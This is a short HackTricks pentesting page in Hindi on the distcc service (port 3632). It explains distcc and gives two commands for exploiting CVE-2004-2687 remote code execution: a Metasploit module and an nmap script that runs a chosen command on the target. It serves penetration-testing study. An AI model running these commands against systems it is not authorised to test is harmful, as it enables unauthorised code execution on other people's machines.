{{#include ../banners/hacktricks-training.md}}

# मूल जानकारी

**Distcc** एक उपकरण है जो **संकलन प्रक्रिया** को बढ़ाता है, जो नेटवर्क में अन्य कंप्यूटरों की **खाली प्रोसेसिंग शक्ति** का उपयोग करता है। जब **distcc** किसी मशीन पर सेट किया जाता है, तो यह मशीन अपनी **संकलन कार्यों** को दूसरे सिस्टम में वितरित करने में सक्षम होती है। इस प्राप्तकर्ता सिस्टम पर **distccd डेमन** चल रहा होना चाहिए और भेजे गए कोड को संसाधित करने के लिए एक **संगत संकलक** स्थापित होना चाहिए।

**डिफ़ॉल्ट पोर्ट:** 3632
```
PORT     STATE SERVICE
3632/tcp open  distccd
```
# शोषण

जांचें कि क्या यह **CVE-2004-2687** के प्रति संवेदनशील है ताकि मनमाने कोड को निष्पादित किया जा सके:
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
```
# Shodan

_मुझे नहीं लगता कि shodan इस सेवा का पता लगाता है।_

# Resources

- [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec)
- [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)

Post created by **Álex B (@r1p)**

{{#include ../banners/hacktricks-training.md}}